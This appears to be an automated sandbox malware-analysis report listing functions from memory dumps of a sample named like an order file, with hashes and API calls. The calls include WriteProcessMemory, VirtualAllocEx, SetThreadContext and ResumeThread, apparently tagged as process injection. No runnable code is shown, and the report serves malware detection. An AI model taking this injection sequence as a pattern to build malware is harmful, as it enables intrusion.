                                                  • Opcode Fuzzy Hash: bf2cbf2d5d11824937f2ad2fd2422ded7d21201734e3d21b158c47a20dd889cf
                                                  • Instruction Fuzzy Hash: C141A271C00719CFEB25DFAAC88479DBBF5BF49304F20805AD809AB251DB756949CF91
                                                  Function 07AA59E8 Relevance: 1.6, APIs: 1, Instructions: 76injectionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 782 7aa59e8-7aa5a3e 785 7aa5a4e-7aa5a8d WriteProcessMemory 782->785 786 7aa5a40-7aa5a4c 782->786 788 7aa5a8f-7aa5a95 785->788 789 7aa5a96-7aa5ac6 785->789 786->785 788->789
                                                  APIs
                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07AA5A80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 2c37266207f69fbd10315bfae633c782691ca0d2b861b4ebaca7395ccc759382
                                                  • Instruction ID: 2e21af085b44b2df587cf85fcdca010724656d170b6ab24a4656e0a6633c5ea7
                                                  • Opcode Fuzzy Hash: 2c37266207f69fbd10315bfae633c782691ca0d2b861b4ebaca7395ccc759382
                                                  • Instruction Fuzzy Hash: 7D2147B5D003199FDB14CFA9D884BEEBBF5FF48310F10842AE918A7241C7799950CBA5
                                                  Function 07AA59F0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 793 7aa59f0-7aa5a3e 795 7aa5a4e-7aa5a8d WriteProcessMemory 793->795 796 7aa5a40-7aa5a4c 793->796 798 7aa5a8f-7aa5a95 795->798 799 7aa5a96-7aa5ac6 795->799 796->795 798->799
                                                  APIs
                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07AA5A80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 81ab655aae857939c71f53975bd94f726d4f8d3aac091bdd46b94f9677bd3908
                                                  • Instruction ID: 0d6c9345465575b9cfc1842deef20a7fdcc554e92a21fe2230dfe230693cd573
                                                  • Opcode Fuzzy Hash: 81ab655aae857939c71f53975bd94f726d4f8d3aac091bdd46b94f9677bd3908
                                                  • Instruction Fuzzy Hash: BE2124B1D003199FDB14CFAAC884BEEBBF5FF48310F10842AE918A7240D7799950CBA5
                                                  Function 07AA5853 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AA58D6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 8a89088a5a05db5eef652313f6bf2b1c94c756fc75cf27c171e58202a7898d10
                                                  • Instruction ID: 8bcf455c3b6c60fdfffcac24c044c7df811d339b5416be54369ea6887865b725
                                                  • Opcode Fuzzy Hash: 8a89088a5a05db5eef652313f6bf2b1c94c756fc75cf27c171e58202a7898d10
                                                  • Instruction Fuzzy Hash: 4A2157B5D003099FDB24CFAAC485BEEBBF4EB48310F10842AD518A7241CB789944CFA5
                                                  Function 07AA5AD8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07AA5B60
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 966ade5f171aec12df52c3f9505be476ec71588a472614a42e1bfc082f9ae601
                                                  • Instruction ID: 68826e883e3a677d8e4f739d475a741286624eb77a37df05b4df848569019ad1
                                                  • Opcode Fuzzy Hash: 966ade5f171aec12df52c3f9505be476ec71588a472614a42e1bfc082f9ae601
                                                  • Instruction Fuzzy Hash: C62126B5C003599FDB10CFAAD840BEEFBF5FF48210F14842AE558A7640D7399540CBA5
                                                  Function 07AA5AE0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07AA5B60
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 5f6353bc542f0014547586fc156513a6d1193b465f5cb68f5826ad5d08ccfc1b
                                                  • Instruction ID: d751de8b475ed85223a4e007816626479a5173f8a712cca0affa3668fdda4581
                                                  • Opcode Fuzzy Hash: 5f6353bc542f0014547586fc156513a6d1193b465f5cb68f5826ad5d08ccfc1b
                                                  • Instruction Fuzzy Hash: CC21F2B1C003599FDB14DFAAC880BEEFBF5FF48210F10842AE918A7240D73999008BA5
                                                  Function 07AA5858 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AA58D6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 7a0db2da5ce542b8f0e82ebfc83e3c1344286170e4e62f4f15e4cefd132c4d9c
                                                  • Instruction ID: 53328c438aa7f8dcc354fdd646f84a84f051fa3e2c11db24032d72030af376b8
                                                  • Opcode Fuzzy Hash: 7a0db2da5ce542b8f0e82ebfc83e3c1344286170e4e62f4f15e4cefd132c4d9c
                                                  • Instruction Fuzzy Hash: 242135B1D003099FDB14DFAAC485BEEBBF4EF88310F14842AD519A7241CB789944CFA5
                                                  Function 0165D630 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0165D6B7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1276743809.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1650000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 174ed622b918281e660f95e407c1ab97533a59246b4fd4e41c00e6da1551a05f
                                                  • Instruction ID: 8745d870deb79e33c666da3ed5b45590abaf3923b7f6a25811c8f1bda72bbc2d
                                                  • Opcode Fuzzy Hash: 174ed622b918281e660f95e407c1ab97533a59246b4fd4e41c00e6da1551a05f
                                                  • Instruction Fuzzy Hash: 7921E4B5D00258EFDB10CF9AD884ADEFBF4EB48310F14801AE918A7350D379A940CFA5
                                                  Function 0165D629 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0165D6B7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1276743809.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1650000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 7b2e51ee33567a269aa71cea903d04a3b9a8d12ad307360706b60232d808a179
                                                  • Instruction ID: dd4f0ceebcc34f09b30d6fc7a26174bebc8c76f02d46afca964e4e4ca3f0632a
                                                  • Opcode Fuzzy Hash: 7b2e51ee33567a269aa71cea903d04a3b9a8d12ad307360706b60232d808a179
                                                  • Instruction Fuzzy Hash: C92114B5D00259DFDB10CFAAD984ADEBBF4EB48310F14841AE918A3350C338A940CF64
                                                  Function 07AA592B Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07AA599E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 5f689526c11584e6070c29359c5cbfb8e440a5f62f335ddd8b838654282cad5e
                                                  • Instruction ID: 4b26873ec001dbd567d629314fe38edf2a6e76ee2eed16ca5b427813e24dbb67
                                                  • Opcode Fuzzy Hash: 5f689526c11584e6070c29359c5cbfb8e440a5f62f335ddd8b838654282cad5e
                                                  • Instruction Fuzzy Hash: D2114776800249DFDB24CFAAD844BEEBBF5EB88320F10841AE515A7650CB369540CBA5
                                                  Function 07AA57A0 Relevance: 1.6, APIs: 1, Instructions: 56threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: bd7ded8d7291a502cce62723d28e6cf679464c8072d1146157f8d51ded31d80f
                                                  • Instruction ID: e47caac4b3c88d54bee953a8bc273ef77db0647563276acd55d5618bb6c94699
                                                  • Opcode Fuzzy Hash: bd7ded8d7291a502cce62723d28e6cf679464c8072d1146157f8d51ded31d80f
                                                  • Instruction Fuzzy Hash: F4115BB5C00348DFDB24DFAAD4457EEFBF5EB88320F14841AD515A7640CB75A540CBA5
                                                  Function 07AA5930 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07AA599E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 56149c363c61e6690c48c22586b45707a5e5dad07ce161f6656e65f54fb063b0
                                                  • Instruction ID: c5c99ca1bac3765474b634273351550154e9a92f2d9bca599c986a427edcdb78
                                                  • Opcode Fuzzy Hash: 56149c363c61e6690c48c22586b45707a5e5dad07ce161f6656e65f54fb063b0
                                                  • Instruction Fuzzy Hash: 7E115971C00349DFDB24CFAAC844BEEBBF5EB88320F108419E515A7250C7359500CBA5
                                                  Function 07AA57A8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: dd38e1ef2d76b0d3eb5665b41fbe400c12726a48963091bf4dcc243a8c14ec1f
                                                  • Instruction ID: 27410d18cf6e47931bca2675a5eea9c690bc4d67f8ddbab29c0bc5789dde4eab
                                                  • Opcode Fuzzy Hash: dd38e1ef2d76b0d3eb5665b41fbe400c12726a48963091bf4dcc243a8c14ec1f
                                                  • Instruction Fuzzy Hash: F3113AB1D00349DFDB24DFAAD4457EEFBF5EB88320F24841AD519A7240CB79A540CB95
                                                  Function 07AA88B9 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07AA891D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: 198cff16bdc65e00470cd7dcade442b134b3b3f667ed5954949a722816b4bb8c
                                                  • Instruction ID: ebca703a3743cd7b0a026967c259a6fa91a8a79132dfc3a8fbe07b585777ea19
                                                  • Opcode Fuzzy Hash: 198cff16bdc65e00470cd7dcade442b134b3b3f667ed5954949a722816b4bb8c
                                                  • Instruction Fuzzy Hash: 9711F8B5800249DFDB10CF9AD545BDEFBF8FB48310F10841AE554A7650C375A544CFA1
                                                  Function 07AA6AA4 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07AA891D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: 1912e247e2a2a6f468ff122f010e8629c6126b72ccba057107c9cb5c420dafdc
                                                  • Instruction ID: e96b07d00639d16994cf02abc38ab82a91c87f7e868aa11f64a5a70b92f23d3d
                                                  • Opcode Fuzzy Hash: 1912e247e2a2a6f468ff122f010e8629c6126b72ccba057107c9cb5c420dafdc
                                                  • Instruction Fuzzy Hash: 3111F2B5804349EFDB21DF9AD885BDEBBF8EB48310F10841AE558A7240C379A944CFA5
                                                  Function 0165AF38 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0165AF9E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1276743809.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1650000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: f743cd7f0cc9b953884ac51acd508f9dd99eefc9a33f3ada150ab94711ca3898
                                                  • Instruction ID: b215d04654fb66515016a24e0142713aaffc7ee881c5f42bf53a68f219a96a6a
                                                  • Opcode Fuzzy Hash: f743cd7f0cc9b953884ac51acd508f9dd99eefc9a33f3ada150ab94711ca3898
                                                  • Instruction Fuzzy Hash: 4E1110B6C00249CFDB24CF9AD844BDEFBF4EB88214F10851AD918A7340C379A545CFA1
                                                  Function 05907442 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0,Iq
                                                  • API String ID: 0-3867225567
                                                  • Opcode ID: 4cb68fe7c40ce98d0ea516b4edfdd8c60ef2ad86fe9a9c27ca596d60be053a8b
                                                  • Instruction ID: 134625dc62e6fa3f658a62a097b505c560d6dd5b9d94c99575fdf860cf8d5f53
                                                  • Opcode Fuzzy Hash: 4cb68fe7c40ce98d0ea516b4edfdd8c60ef2ad86fe9a9c27ca596d60be053a8b
                                                  • Instruction Fuzzy Hash: 91518331F002049BD714ABB8D4556ADBBB2FF89300F5485ADD9426B386CF71AE59C781
                                                  Function 05906F9C Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Teq
                                                  • API String ID: 0-1098410595
                                                  • Opcode ID: e6b3a48f68546df3920649f6a7da62ada52613e91f6c54f6eaa2fed31e3f2ea8
                                                  • Instruction ID: c28c4f85be9c8b76e567611d442030c87bb2bcddeb6d2d273910b964054e29e0
                                                  • Opcode Fuzzy Hash: e6b3a48f68546df3920649f6a7da62ada52613e91f6c54f6eaa2fed31e3f2ea8
                                                  • Instruction Fuzzy Hash: 1C517075B006068FCB15DF79D8449BEBBF6FFC5220B158929E41ADB391EB3098068790
                                                  Function 05907450 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0,Iq
                                                  • API String ID: 0-3867225567
                                                  • Opcode ID: 5915b6ff80e48d7a1a9a91c61f9558ce8a5c250f71bca5a9d85da1462bca0bda
                                                  • Instruction ID: 1b7fc7fbadc4e847d0f7ae44546a089240e90e23823855a7ee9ccf4d9e40eef5
                                                  • Opcode Fuzzy Hash: 5915b6ff80e48d7a1a9a91c61f9558ce8a5c250f71bca5a9d85da1462bca0bda
                                                  • Instruction Fuzzy Hash: 86518131F002049BD714ABB8D455AADBBB2FF89300F5485A9E8426B386CF71AE59C781
                                                  Function 05908BE0 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Teq
                                                  • API String ID: 0-1098410595
                                                  • Opcode ID: d8611d71b7d6f238727723eb8b5ff5602c8a5a96704c01b19b9841dc387c14e8
                                                  • Instruction ID: 862b4d6a755ad4f5d0add4b00212f8e81aa4f808a5a87096d890065c68413459
                                                  • Opcode Fuzzy Hash: d8611d71b7d6f238727723eb8b5ff5602c8a5a96704c01b19b9841dc387c14e8
                                                  • Instruction Fuzzy Hash: 99115131F002198FCB54EBB998146EEBBF6AF89320B104879C505E7384EB31CD02CB95
                                                  Function 05908C18 Relevance: 1.3, Strings: 1, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Teq
                                                  • API String ID: 0-1098410595
                                                  • Opcode ID: dfde0da7f1ea9a1127301dde7f27745601c0d81efd7f875e2cea5e43f0c01902
                                                  • Instruction ID: 78f7b204ee6b7c921e5f6b96026b415f6ff9ec495a34cb4a2e7f522139d37703
                                                  • Opcode Fuzzy Hash: dfde0da7f1ea9a1127301dde7f27745601c0d81efd7f875e2cea5e43f0c01902
                                                  • Instruction Fuzzy Hash: A6F06D36B002148FDB58EA6898156EE67F7AFC5260B254C69C941A73C8EE22CC06C791
                                                  Function 05900D68 Relevance: .3, Instructions: 289COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6be7a310bbace36decda0c6f7c04f1d5af057cf0af4a683a0c45e35e92e02048
                                                  • Instruction ID: 2f7fb8679521d750ab1caf3392fcd440b82334659f27e168aec0b29f9768542c
                                                  • Opcode Fuzzy Hash: 6be7a310bbace36decda0c6f7c04f1d5af057cf0af4a683a0c45e35e92e02048
                                                  • Instruction Fuzzy Hash: C8A18FB1B002059FDB14DFA9D4497AF7BF6EB88210F14892EE50AD7390DA34A845CBA5
                                                  Function 059026C0 Relevance: .2, Instructions: 210COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2f8d63bb5256792faa50cd32ed607682f102a595bf0ba84f4ceaf29a1b3a3fbe
                                                  • Instruction ID: 5b912fc5ee2e9d9188fdcb24b5769b481c65c3c7b89e50ae2faa5f5b4b65f51d
                                                  • Opcode Fuzzy Hash: 2f8d63bb5256792faa50cd32ed607682f102a595bf0ba84f4ceaf29a1b3a3fbe
                                                  • Instruction Fuzzy Hash: D6815A75E003198FDF14DFA9D8946AEBBF6FF88300F24852AE405AB394DB349905CB91
                                                  Function 0590AF70 Relevance: .2, Instructions: 175COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d48a450a81cc067102622f10209933efec59255eb9d48fa86190a0a4e985e2b1
                                                  • Instruction ID: 1b30ec36adb03cd4d7af01e1ee7fe67edca63712019f43b223272467260c0ed7
                                                  • Opcode Fuzzy Hash: d48a450a81cc067102622f10209933efec59255eb9d48fa86190a0a4e985e2b1
                                                  • Instruction Fuzzy Hash: DF51C674F002099FEB14DBA9D851BBEBBB7FB84211F148926E655A73C4CB385902CBD1
                                                  Function 05901864 Relevance: .2, Instructions: 173COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fc0bd72edb1cc8ddc156d5e42e2cf53e58aec1a4e563a7d787b66d7caaedcb9f
                                                  • Instruction ID: e97d8bcc0607e342e4dc7e0c4c1c82f6241616e4f5f660f66d6d006b0864c986
                                                  • Opcode Fuzzy Hash: fc0bd72edb1cc8ddc156d5e42e2cf53e58aec1a4e563a7d787b66d7caaedcb9f
                                                  • Instruction Fuzzy Hash: 94510371B087419FD715CF29D854AABBBF5EF8920071589AAE409DB2A1DB30AC02C791
                                                  Function 059017A4 Relevance: .2, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf692557d30e68e96d16f5863d92cda3ee6dcf83b320d7a2e45224b0c4863d39
                                                  • Instruction ID: 945b708d41f8092981b2f0493bff7e36afa4cefba8eee8eaaaf026e7f3b33309
                                                  • Opcode Fuzzy Hash: bf692557d30e68e96d16f5863d92cda3ee6dcf83b320d7a2e45224b0c4863d39
                                                  • Instruction Fuzzy Hash: E341CD30E11218DFCB14DFB4E8486AEBBB2FF84301F10886AE846A7291DB34A955CB50
                                                  Function 059011C0 Relevance: .2, Instructions: 167COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f80dfe4c4cad641fa3443b78792a419554cca34af4c429d8d5f9b7dd28f2f2e3
                                                  • Instruction ID: 1b72d8e97c04df13ae71f7f95ab78c573239153143d516db1d9abc8b531fbd4d
                                                  • Opcode Fuzzy Hash: f80dfe4c4cad641fa3443b78792a419554cca34af4c429d8d5f9b7dd28f2f2e3
                                                  • Instruction Fuzzy Hash: D2516A30B002058FDB15DB69C884BAEB7AAFF89700F54496DE90ADB3A1DB71EC45CB50
                                                  Function 0590AF60 Relevance: .2, Instructions: 162COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f9fe273e62deaf98de6433a98186bbae8c2de05facda04a7435632a966f4b1d1
                                                  • Instruction ID: b29455833458ad7f7e9b1ff1e430a55ca46c02c8c96ba40f35f625badfdd71ef
                                                  • Opcode Fuzzy Hash: f9fe273e62deaf98de6433a98186bbae8c2de05facda04a7435632a966f4b1d1
                                                  • Instruction Fuzzy Hash: 9551E170E002099FEB14DBA5D851BAEBBB3FB84311F148926E655A73C4CB389902CBD1
                                                  Function 05900D58 Relevance: .2, Instructions: 157COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a467d6cf33f30bbaf35565f897acbf808ac6e9f220d4091f892a4e999bf46ab7
                                                  • Instruction ID: 7f9c61f0fb7fb678c2e9a66909f8c92d092a4f249638494e57bf69d760150a61
                                                  • Opcode Fuzzy Hash: a467d6cf33f30bbaf35565f897acbf808ac6e9f220d4091f892a4e999bf46ab7
                                                  • Instruction Fuzzy Hash: 2341D4B1B002159FD718AFA9D81977F7AABFBC4250F14842EE50AD7394DE34AC0287E5
                                                  Function 05900848 Relevance: .1, Instructions: 146COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
